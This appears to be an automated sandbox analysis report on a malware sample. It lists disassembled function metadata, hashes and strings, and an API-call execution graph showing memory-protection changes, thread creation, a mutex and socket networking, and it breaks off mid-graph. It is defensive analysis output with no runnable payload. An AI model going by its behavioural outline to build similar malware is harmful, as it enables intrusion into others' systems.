                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                      • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                                      • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                      • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                                      Function 010FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 011372A3
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                                      • RTL: Re-Waiting, xrefs: 011372C1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                      • Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
                                                      • Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                      • Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
                                                      Function 01172300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                      • Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
                                                      • Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                      • Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
                                                      Function 01107D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
                                                      Function 010C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                      • Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
                                                      • Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                                      • Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0
                                                      Function 0114CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0114CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 5cd93b4047db110c4acb45202e462e12528f403a3e6b5f5be8847b3146c24d9a
                                                      • Instruction ID: a5cf49cd76bdda2418164d1ec34f04db0965835d8defbcce980efbe2d0be7e67
                                                      • Opcode Fuzzy Hash: 5cd93b4047db110c4acb45202e462e12528f403a3e6b5f5be8847b3146c24d9a
                                                      • Instruction Fuzzy Hash: 2241AE71900219DFCF29DFE9D880AAEBBB8FF64B40F00412AE955DB254D734D841CBA5

                                                      Execution Graph

                                                      Execution Coverage:2.3%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:4.7%
                                                      Total number of Nodes:444
                                                      Total number of Limit Nodes:16
                                                      execution_graph 13857 10ead22a 13858 10ead25e 13857->13858 13859 10eac8c2 ObtainUserAgentString 13858->13859 13860 10ead26b 13859->13860 13822 10eb3aa9 13823 10eb3aaf 13822->13823 13826 10eae212 13823->13826 13825 10eb3ac7 13827 10eae21b 13826->13827 13828 10eae237 13826->13828 13827->13828 13829 10eae0c2 6 API calls 13827->13829 13828->13825 13829->13828 13861 10ea742e 13862 10ea745b 13861->13862 13870 10ea74c9 13861->13870 13863 10eb1232 NtCreateFile 13862->13863 13862->13870 13864 10ea7496 13863->13864 13865 10ea74c5 13864->13865 13867 10ea7082 NtCreateFile 13864->13867 13866 10eb1232 NtCreateFile 13865->13866 13865->13870 13866->13870 13868 10ea74b6 13867->13868 13868->13865 13869 10ea6f52 NtCreateFile 13868->13869 13869->13865 13974 10eae72e 13975 10eae76a 13974->13975 13976 10eae788 connect 13974->13976 13975->13976 13574 10eb2bac 13575 10eb2bb1 13574->13575 13608 10eb2bb6 13575->13608 13609 10ea8b72 13575->13609 13577 10eb2c2c 13578 10eb2c85 13577->13578 13580 10eb2c69 13577->13580 13581 10eb2c54 13577->13581 13577->13608 13579 10eb0ab2 NtProtectVirtualMemory 13578->13579 13582 10eb2c8d 13579->13582 13584 10eb2c6e 13580->13584 13585 10eb2c80 13580->13585 13583 10eb0ab2 NtProtectVirtualMemory 13581->13583 13645 10eaa102 13582->13645 13588 10eb2c5c 13583->13588 13589 10eb0ab2 NtProtectVirtualMemory 13584->13589 13585->13578 13586 10eb2c97 13585->13586 13590 10eb2cbe 13586->13590 13591 10eb2c9c 13586->13591 13631 10ea9ee2 13588->13631 13593 10eb2c76 13589->13593 13595 10eb2cd9 13590->13595 13596 10eb2cc7 13590->13596 13590->13608 13613 10eb0ab2 13591->13613 13637 10ea9fc2 13593->13637 13600 10eb0ab2 NtProtectVirtualMemory 13595->13600 13595->13608 13597 10eb0ab2 NtProtectVirtualMemory 13596->13597 13599 10eb2ccf 13597->13599 13655 10eaa2f2 13599->13655 13603 10eb2ce5 13600->13603 13673 10eaa712 13603->13673 13610 10ea8b93 13609->13610 13611 10ea8cb5 CreateMutexW 13610->13611 13612 10ea8cce 13610->13612 13611->13612 13612->13577 13615 10eb0adf 13613->13615 13614 10eb0ebc 13623 10ea9de2 13614->13623 13615->13614 13685 10ea68f2 13615->13685 13617 10eb0e5c 13618 10ea68f2 NtProtectVirtualMemory 13617->13618 13619 10eb0e7c 13618->13619 13620 10ea68f2 NtProtectVirtualMemory 13619->13620 13621 10eb0e9c 13620->13621 13622 10ea68f2 NtProtectVirtualMemory 13621->13622 13622->13614 13624 10ea9df0 13623->13624 13626 10ea9ecd 13624->13626 13710 10ead382 13624->13710 13627 10ea6412 13626->13627 13628 10ea6440 13627->13628 13629 10ea6473 13628->13629 13630 10ea644d CreateThread 13628->13630 13629->13608 13630->13608 13633 10ea9f06 13631->13633 13632 10ea9fa4 13632->13608 13633->13632 13634 10ea68f2 NtProtectVirtualMemory 13633->13634 13635 10ea9f9c 13634->13635 13636 10ead382 ObtainUserAgentString 13635->13636 13636->13632 13639 10eaa016 13637->13639 13638 10eaa0f0 13638->13608 13639->13638 13642 10ea68f2 NtProtectVirtualMemory 13639->13642 13643 10eaa0bb 13639->13643 13640 10eaa0e8 13641 10ead382 ObtainUserAgentString 13640->13641 13641->13638 13642->13643 13643->13640 13644 10ea68f2 NtProtectVirtualMemory 13643->13644 13644->13640 13647 10eaa137 13645->13647 13646 10eaa2d5 13646->13608 13647->13646 13648 10ea68f2 NtProtectVirtualMemory 13647->13648 13649 10eaa28a 13648->13649 13650 10ea68f2 NtProtectVirtualMemory 13649->13650 13653 10eaa2a9 13650->13653 13651 10eaa2cd 13652 10ead382 ObtainUserAgentString 13651->13652 13652->13646 13653->13651 13654 10ea68f2 NtProtectVirtualMemory 13653->13654 13654->13651 13656 10eaa349 13655->13656 13657 10eaa49f 13656->13657 13659 10ea68f2 NtProtectVirtualMemory 13656->13659 13658 10ea68f2 NtProtectVirtualMemory 13657->13658 13662 10eaa4c3 13657->13662 13658->13662 13660 10eaa480 13659->13660 13661 10ea68f2 NtProtectVirtualMemory 13660->13661 13661->13657 13663 10eaa597 13662->13663 13664 10ea68f2 NtProtectVirtualMemory 13662->13664 13665 10ea68f2 NtProtectVirtualMemory 13663->13665 13666 10eaa5bf 13663->13666 13664->13663 13665->13666 13669 10eaa6b9 13666->13669 13671 10ea68f2 NtProtectVirtualMemory 13666->13671 13667 10eaa6e1 13668 10ead382 ObtainUserAgentString 13667->13668 13670 10eaa6e9 13668->13670 13669->13667 13672 10ea68f2 NtProtectVirtualMemory 13669->13672 13670->13608 13671->13669 13672->13667 13674 10eaa767 13673->13674 13675 10ea68f2 NtProtectVirtualMemory 13674->13675 13679 10eaa903 13674->13679 13676 10eaa8e3 13675->13676 13677 10ea68f2 NtProtectVirtualMemory 13676->13677 13677->13679 13678 10eaa9b7 13680 10ead382 ObtainUserAgentString 13678->13680 13681 10ea68f2 NtProtectVirtualMemory 13679->13681 13682 10eaa992 13679->13682 13683 10eaa9bf 13680->13683 13681->13682 13682->13678 13684 10ea68f2 NtProtectVirtualMemory 13682->13684 13683->13608 13684->13678 13686 10ea6987 13685->13686 13688 10ea69b2 13686->13688 13700 10ea7622 13686->13700 13689 10ea6ba2 13688->13689 13691 10ea6ac5 13688->13691 13693 10ea6c0c 13688->13693 13690 10eb2e12 NtProtectVirtualMemory 13689->13690 13699 10ea6b5b 13690->13699 13704 10eb2e12 13691->13704 13693->13617 13694 10eb2e12 NtProtectVirtualMemory 13694->13693 13695 10ea6ae3 13695->13693 13696 10ea6b3d 13695->13696 13697 10eb2e12 NtProtectVirtualMemory 13695->13697 13698 10eb2e12 NtProtectVirtualMemory 13696->13698 13697->13696 13698->13699 13699->13693 13699->13694 13701 10ea767a 13700->13701 13702 10eb2e12 NtProtectVirtualMemory 13701->13702 13703 10ea767e 13701->13703 13702->13701 13703->13688 13705 10eb2e45 NtProtectVirtualMemory 13704->13705 13708 10eb1942 13704->13708 13707 10eb2e70 13705->13707 13707->13695 13709 10eb1967 13708->13709 13709->13705 13711 10ead3c7 13710->13711 13714 10ead232 13711->13714 13713 10ead438 13713->13626 13715 10ead25e 13714->13715 13718 10eac8c2 13715->13718 13717 10ead26b 13717->13713 13720 10eac934 13718->13720 13719 10eac9a6 13719->13717 13720->13719 13721 10eac995 ObtainUserAgentString 13720->13721 13721->13719 13746 10eabce2 13747 10eabdd9 13746->13747 13748 10eac022 13747->13748 13752 10eab352 13747->13752 13750 10eabf0d 13750->13748 13761 10eab792 13750->13761 13753 10eab39e 13752->13753 13754 10eab4ec 13753->13754 13756 10eab595 13753->13756 13760 10eab58e 13753->13760 13755 10eb1232 NtCreateFile 13754->13755 13758 10eab4ff 13755->13758 13757 10eb1232 NtCreateFile 13756->13757 13756->13760 13757->13760 13759 10eb1232 NtCreateFile 13758->13759 13758->13760 13759->13760 13760->13750 13762 10eab7e0 13761->13762 13763 10eb1232 NtCreateFile 13762->13763 13766 10eab90c 13763->13766 13764 10eabaf3 13764->13750 13765 10eab352 NtCreateFile 13765->13766 13766->13764 13766->13765 13767 10eab602 NtCreateFile 13766->13767 13767->13766 13938 10ea8b66 13939 10ea8b6a 13938->13939 13940 10ea8cb5 CreateMutexW 13939->13940 13941 10ea8cce 13939->13941 13940->13941 13768 10eae2e4 13769 10eae36f 13768->13769 13770 10eae305 13768->13770 13770->13769 13772 10eae0c2 13770->13772 13773 10eae0cb 13772->13773 13775 10eae1f0 13772->13775 13774 10eb1f82 6 API calls 13773->13774 13773->13775 13774->13775 13775->13769 13776 10eaa0fb 13778 10eaa137 13776->13778 13777 10eaa2d5 13778->13777 13779 10ea68f2 NtProtectVirtualMemory 13778->13779 13780 10eaa28a 13779->13780 13781 10ea68f2 NtProtectVirtualMemory 13780->13781 13784 10eaa2a9 13781->13784 13782 10eaa2cd 13783 10ead382 ObtainUserAgentString 13782->13783 13783->13777 13784->13782 13785 10ea68f2 NtProtectVirtualMemory 13784->13785 13785->13782 13871 10eb083a 13872 10eb0841 13871->13872 13873 10eb1f82 6 API calls 13872->13873 13875 10eb08c5 13873->13875 13874 10eb0906 13875->13874 13876 10eb1232 NtCreateFile 13875->13876 13876->13874 13942 10eb1f7a 13943 10eb1fb8 13942->13943 13944 10eae5b2 socket 13943->13944 13945 10eb2081 13943->13945 13953 10eb2022 13943->13953 13944->13945 13946 10eb2134 13945->13946 13948 10eb2117 getaddrinfo 13945->13948 13945->13953 13947 10eae732 connect 13946->13947 13951 10eb21b2 13946->13951 13946->13953 13947->13951 13948->13946 13949 10eae6b2 send 13952 10eb2729 13949->13952 13950 10eb27f4 setsockopt recv 13950->13953 13951->13949 13951->13953 13952->13950 13952->13953 13830 10eae0b9 13831 10eae1f0 13830->13831 13832 10eae0ed 13830->13832 13832->13831 13833 10eb1f82 6 API calls 13832->13833 13833->13831 13834 10eac8be 13835 10eac8c3 13834->13835 13836 10eac9a6 13835->13836 13837 10eac995 ObtainUserAgentString 13835->13837 13837->13836 13913 10ea9fbf 13915 10eaa016 13913->13915 13914 10eaa0f0 13915->13914 13918 10ea68f2 NtProtectVirtualMemory 13915->13918 13919 10eaa0bb 13915->13919 13916 10eaa0e8 13917 10ead382 ObtainUserAgentString 13916->13917 13917->13914 13918->13919 13919->13916 13920 10ea68f2 NtProtectVirtualMemory 13919->13920 13920->13916 13921 10eb39b3 13922 10eb39bd 13921->13922 13925 10ea86d2 13922->13925 13924 10eb39e0 13926 10ea86f7 13925->13926 13927 10ea8704 13925->13927 13929 10ea60f2 6 API calls 13926->13929 13928 10ea86ff 13927->13928 13930 10ea872d 13927->13930 13932 10ea8737 13927->13932 13928->13924 13929->13928 13934 10eae2c2 13930->13934 13932->13928 13933 10eb1f82 6 API calls 13932->13933 13933->13928 13935 10eae2df 13934->13935 13936 10eae2cb 13934->13936 13935->13928 13936->13935 13937 10eae0c2 6 API calls 13936->13937 13937->13935 13726 10eb1232 13727 10eb1334 13726->13727 13728 10eb125c 13726->13728 13728->13727 13729 10eb1410 NtCreateFile 13728->13729 13729->13727 13893 10eb39f1 13894 10eb39f7 13893->13894 13897 10ea8852 13894->13897 13896 10eb3a0f 13898 10ea88e4 13897->13898 13899 10ea8865 13897->13899 13898->13896 13899->13898 13900 10ea8887 13899->13900 13903 10ea887e 13899->13903 13900->13898 13902 10eac662 6 API calls 13900->13902 13901 10eae36f 13901->13896 13902->13898 13903->13901 13904 10eae0c2 6 API calls 13903->13904 13904->13901 13786 10ea60f1 13787 10ea6109 13786->13787 13791 10ea61d3 13786->13791 13788 10ea6012 6 API calls 13787->13788 13789 10ea6113 13788->13789 13790 10eb1f82 6 API calls 13789->13790 13789->13791 13790->13791 13905 10ea75f1 13906 10ea760e 13905->13906 13907 10ea7606 13905->13907 13908 10eac662 6 API calls 13907->13908 13908->13906 13792 10eaa2f4 13793 10eaa349 13792->13793 13794 10eaa49f 13793->13794 13796 10ea68f2 NtProtectVirtualMemory 13793->13796 13795 10ea68f2 NtProtectVirtualMemory 13794->13795 13799 10eaa4c3 13794->13799 13795->13799 13797 10eaa480 13796->13797 13798 10ea68f2 NtProtectVirtualMemory 13797->13798 13798->13794 13800 10eaa597 13799->13800 13801 10ea68f2 NtProtectVirtualMemory 13799->13801 13802 10ea68f2 NtProtectVirtualMemory 13800->13802 13804 10eaa5bf 13800->13804 13801->13800 13802->13804 13803 10eaa6e1 13806 10ead382 ObtainUserAgentString 13803->13806 13805 10eaa6b9 13804->13805 13808 10ea68f2 NtProtectVirtualMemory 13804->13808 13805->13803 13809 10ea68f2 NtProtectVirtualMemory 13805->13809 13807 10eaa6e9 13806->13807 13808->13805 13809->13803 13958 10eab14a 13959 10eab153 13958->13959 13964 10eab174 13958->13964 13961 10ead382 ObtainUserAgentString 13959->13961 13960 10eab1e7 13962 10eab16c 13961->13962 13963 10ea60f2 6 API calls 13962->13963 13963->13964 13964->13960 13966 10ea61f2 13964->13966 13967 10ea62c9 13966->13967 13968 10ea620f 13966->13968 13967->13964 13969 10eb0f12 7 API calls 13968->13969 13971 10ea6242 13968->13971 13969->13971 13970 10ea6289 13970->13967 13972 10ea60f2 6 API calls 13970->13972 13971->13970 13973 10ea7432 NtCreateFile 13971->13973 13972->13967 13973->13970 13877 10eb2e0a 13878 10eb1942 13877->13878 13879 10eb2e45 NtProtectVirtualMemory 13878->13879 13880 10eb2e70 13879->13880 13838 10eb3a4d 13839 10eb3a53 13838->13839 13842 10ea7782 13839->13842 13841 10eb3a6b 13844 10ea778f 13842->13844 13843 10ea77ad 13843->13841 13844->13843 13846 10eac662 13844->13846 13847 10eac66b 13846->13847 13855 10eac7ba 13846->13855 13848 10ea60f2 6 API calls 13847->13848 13847->13855 13850 10eac6ee 13848->13850 13849 10eac750 13852 10eac83f 13849->13852 13854 10eac791 13849->13854 13849->13855 13850->13849 13851 10eb1f82 6 API calls 13850->13851 13851->13849 13853 10eb1f82 6 API calls 13852->13853 13852->13855 13853->13855 13854->13855 13856 10eb1f82 6 API calls 13854->13856 13855->13843 13856->13855 13734 10eb1f82 13735 10eb1fb8 13734->13735 13736 10eae5b2 socket 13735->13736 13737 10eb2081 13735->13737 13744 10eb2022 13735->13744 13736->13737 13738 10eb2134 13737->13738 13740 10eb2117 getaddrinfo 13737->13740 13737->13744 13739 10eae732 connect 13738->13739 13742 10eb21b2 13738->13742 13738->13744 13739->13742 13740->13738 13741 10eae6b2 send 13743 10eb2729 13741->13743 13742->13741 13742->13744 13743->13744 13745 10eb27f4 setsockopt recv 13743->13745 13745->13744 13909 10ea9dd9 13910 10ea9df0 13909->13910 13911 10ead382 ObtainUserAgentString 13910->13911 13912 10ea9ecd 13910->13912 13911->13912 13881 10eb3a1f 13882 10eb3a25 13881->13882 13885 10ea75f2 13882->13885 13884 10eb3a3d 13886 10ea75fb 13885->13886 13887 10ea760e 13885->13887 13886->13887 13888 10eac662 6 API calls 13886->13888 13887->13884 13888->13887 13483 10ea62dd 13486 10ea631a 13483->13486 13484 10ea63fa 13485 10ea6328 SleepEx 13485->13485 13485->13486 13486->13484 13486->13485 13490 10eb0f12 13486->13490 13499 10ea7432 13486->13499 13509 10ea60f2 13486->13509 13498 10eb0f48 13490->13498 13491 10eb1134 13491->13486 13492 10eb10e9 13494 10eb1125 13492->13494 13527 10eb0842 13492->13527 13535 10eb0922 13494->13535 13496 10eb1232 NtCreateFile 13496->13498 13498->13491 13498->13492 13498->13496 13515 10eb1f82 13498->13515 13500 10ea745b 13499->13500 13508 10ea74c9 13499->13508 13501 10eb1232 NtCreateFile 13500->13501 13500->13508 13502 10ea7496 13501->13502 13503 10ea74c5 13502->13503 13556 10ea7082 13502->13556 13504 10eb1232 NtCreateFile 13503->13504 13503->13508 13504->13508 13506 10ea74b6 13506->13503 13565 10ea6f52 13506->13565 13508->13486 13510 10ea6109 13509->13510 13514 10ea61d3 13509->13514 13570 10ea6012 13510->13570 13512 10ea6113 13513 10eb1f82 6 API calls 13512->13513 13512->13514 13513->13514 13514->13486 13516 10eb1fb8 13515->13516 13518 10eb2081 13516->13518 13525 10eb2022 13516->13525 13543 10eae5b2 13516->13543 13519 10eb2134 13518->13519 13521 10eb2117 getaddrinfo 13518->13521 13518->13525 13523 10eb21b2 13519->13523 13519->13525 13546 10eae732 13519->13546 13521->13519 13523->13525 13549 10eae6b2 13523->13549 13524 10eb2729 13524->13525 13526 10eb27f4 setsockopt recv 13524->13526 13525->13498 13526->13525 13528 10eb086d 13527->13528 13552 10eb1232 13528->13552 13530 10eb0906 13530->13492 13531 10eb0888 13531->13530 13532 10eb1f82 6 API calls 13531->13532 13533 10eb08c5 13531->13533 13532->13533 13533->13530 13534 10eb1232 NtCreateFile 13533->13534 13534->13530 13536 10eb09c2 13535->13536 13537 10eb1232 NtCreateFile 13536->13537 13539 10eb09d6 13537->13539 13538 10eb0a9f 13538->13491 13539->13538 13540 10eb0a5d 13539->13540 13542 10eb1f82 6 API calls 13539->13542 13540->13538 13541 10eb1232 NtCreateFile 13540->13541 13541->13538 13542->13540 13544 10eae60a socket 13543->13544 13545 10eae5ec 13543->13545 13544->13518 13545->13544 13547 10eae76a 13546->13547 13548 10eae788 connect 13546->13548 13547->13548 13548->13523 13550 10eae6e7 13549->13550 13551 10eae705 send 13549->13551 13550->13551 13551->13524 13553 10eb1334 13552->13553 13554 10eb125c 13552->13554 13553->13531 13554->13553 13555 10eb1410 NtCreateFile 13554->13555 13555->13553 13557 10ea7420 13556->13557 13558 10ea70aa 13556->13558 13557->13506 13558->13557 13559 10eb1232 NtCreateFile 13558->13559 13561 10ea71f9 13559->13561 13560 10ea73df 13560->13506 13561->13560 13562 10eb1232 NtCreateFile 13561->13562 13563 10ea73c9 13562->13563 13564 10eb1232 NtCreateFile 13563->13564 13564->13560 13566 10ea6f70 13565->13566 13567 10ea6f84 13565->13567 13566->13503 13568 10eb1232 NtCreateFile 13567->13568 13569 10ea7046 13568->13569 13569->13503 13572 10ea6031 13570->13572 13571 10ea60cd 13571->13512 13572->13571 13573 10eb1f82 6 API calls 13572->13573 13573->13571 13810 10ea9edd 13812 10ea9f06 13810->13812 13811 10ea9fa4 13812->13811 13813 10ea68f2 NtProtectVirtualMemory 13812->13813 13814 10ea9f9c 13813->13814 13815 10ead382 ObtainUserAgentString 13814->13815 13815->13811 13730 10eb2e12 13731 10eb2e45 NtProtectVirtualMemory 13730->13731 13732 10eb1942 13730->13732 13733 10eb2e70 13731->13733 13732->13731 13889 10ea7613 13891 10ea7620 13889->13891 13890 10ea767e 13891->13890 13892 10eb2e12 NtProtectVirtualMemory 13891->13892 13892->13891 13816 10eabcd4 13818 10eabcd8 13816->13818 13817 10eac022 13818->13817 13819 10eab352 NtCreateFile 13818->13819 13820 10eabf0d 13819->13820 13820->13817 13821 10eab792 NtCreateFile 13820->13821 13821->13820

                                                      Executed Functions

                                                      Function 10EB1F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 10eb1f82-10eb1fb6 1 10eb1fb8-10eb1fbc 0->1 2 10eb1fd6-10eb1fd9 0->2 1->2 5 10eb1fbe-10eb1fc2 1->5 3 10eb1fdf-10eb1fed 2->3 4 10eb28fe-10eb290c 2->4 6 10eb1ff3-10eb1ff7 3->6 7 10eb28f6-10eb28f7 3->7 5->2 8 10eb1fc4-10eb1fc8 5->8 9 10eb1ff9-10eb1ffd 6->9 10 10eb1fff-10eb2000 6->10 7->4 8->2 11 10eb1fca-10eb1fce 8->11 9->10 12 10eb200a-10eb2010 9->12 10->12 11->2 13 10eb1fd0-10eb1fd4 11->13 14 10eb203a-10eb2060 12->14 15 10eb2012-10eb2020 12->15 13->2 13->3 17 10eb2068-10eb207c call 10eae5b2 14->17 18 10eb2062-10eb2066 14->18 15->14 16 10eb2022-10eb2026 15->16 16->7 19 10eb202c-10eb2035 16->19 22 10eb2081-10eb20a2 17->22 18->17 20 10eb20a8-10eb20ab 18->20 19->7 23 10eb20b1-10eb20b8 20->23 24 10eb2144-10eb2150 20->24 22->20 25 10eb28ee-10eb28ef 22->25 27 10eb20ba-10eb20dc call 10eb1942 23->27 28 10eb20e2-10eb20f5 23->28 24->25 26 10eb2156-10eb2165 24->26 25->7 31 10eb217f-10eb218f 26->31 32 10eb2167-10eb2178 call 10eae552 26->32 27->28 28->25 30 10eb20fb-10eb2101 28->30 30->25 34 10eb2107-10eb2109 30->34 36 10eb2191-10eb21ad call 10eae732 31->36 37 10eb21e5-10eb221b 31->37 32->31 34->25 40 10eb210f-10eb2111 34->40 43 10eb21b2-10eb21da 36->43 38 10eb222d-10eb2231 37->38 39 10eb221d-10eb222b 37->39 45 10eb2233-10eb2245 38->45 46 10eb2247-10eb224b 38->46 44 10eb227f-10eb2280 39->44 40->25 47 10eb2117-10eb2132 getaddrinfo 40->47 43->37 48 10eb21dc-10eb21e1 43->48 52 10eb2283-10eb22e0 call 10eb2d62 call 10eaf482 call 10eaee72 call 10eb3002 44->52 45->44 49 10eb224d-10eb225f 46->49 50 10eb2261-10eb2265 46->50 47->24 51 10eb2134-10eb213c 47->51 48->37 49->44 53 10eb226d-10eb2279 50->53 54 10eb2267-10eb226b 50->54 51->24 63 10eb22e2-10eb22e6 52->63 64 10eb22f4-10eb2354 call 10eb2d92 52->64 53->44 54->52 54->53 63->64 65 10eb22e8-10eb22ef call 10eaf042 63->65 69 10eb235a-10eb2396 call 10eb2d62 call 10eb3262 call 10eb3002 64->69 70 10eb248c-10eb24b8 call 10eb2d62 call 10eb3262 64->70 65->64 85 10eb23bb-10eb23e9 call 10eb3262 * 2 69->85 86 10eb2398-10eb23b7 call 10eb3262 call 10eb3002 69->86 80 10eb24ba-10eb24d5 70->80 81 10eb24d9-10eb2590 call 10eb3262 * 3 call 10eb3002 * 2 call 10eaf482 70->81 80->81 110 10eb2595-10eb25b9 call 10eb3262 81->110 101 10eb23eb-10eb2410 call 10eb3002 call 10eb3262 85->101 102 10eb2415-10eb241d 85->102 86->85 101->102 103 10eb241f-10eb2425 102->103 104 10eb2442-10eb2448 102->104 107 10eb2467-10eb2487 call 10eb3262 103->107 108 10eb2427-10eb243d 103->108 109 10eb244e-10eb2456 104->109 104->110 107->110 108->110 109->110 114 10eb245c-10eb245d 109->114 120 10eb25bb-10eb25cc call 10eb3262 call 10eb3002 110->120 121 10eb25d1-10eb26ad call 10eb3262 * 7 call 10eb3002 call 10eb2d62 call 10eb3002 call 10eaee72 call 10eaf042 110->121 114->107 132 10eb26af-10eb26b3 120->132 121->132 134 10eb26ff-10eb272d call 10eae6b2 132->134 135 10eb26b5-10eb26fa call 10eae382 call 10eae7b2 132->135 145 10eb272f-10eb2735 134->145 146 10eb275d-10eb2761 134->146 155 10eb28e6-10eb28e7 135->155 145->146 149 10eb2737-10eb274c 145->149 150 10eb290d-10eb2913 146->150 151 10eb2767-10eb276b 146->151 149->146 156 10eb274e-10eb2754 149->156 157 10eb2779-10eb2784 150->157 158 10eb2919-10eb2920 150->158 152 10eb28aa-10eb28df call 10eae7b2 151->152 153 10eb2771-10eb2773 151->153 152->155 153->152 153->157 155->25 156->146 163 10eb2756 156->163 159 10eb2786-10eb2793 157->159 160 10eb2795-10eb2796 157->160 158->159 159->160 164 10eb279c-10eb27a0 159->164 160->164 163->146 167 10eb27a2-10eb27af 164->167 168 10eb27b1-10eb27b2 164->168 167->168 170 10eb27b8-10eb27c4 167->170 168->170 173 10eb27c6-10eb27ef call 10eb2d92 call 10eb2d62 170->173 174 10eb27f4-10eb2861 setsockopt recv 170->174 173->174 177 10eb28a3-10eb28a4 174->177 178 10eb2863 174->178 177->152 178->177 181 10eb2865-10eb286a 178->181 181->177 184 10eb286c-10eb2872 181->184 184->177 185 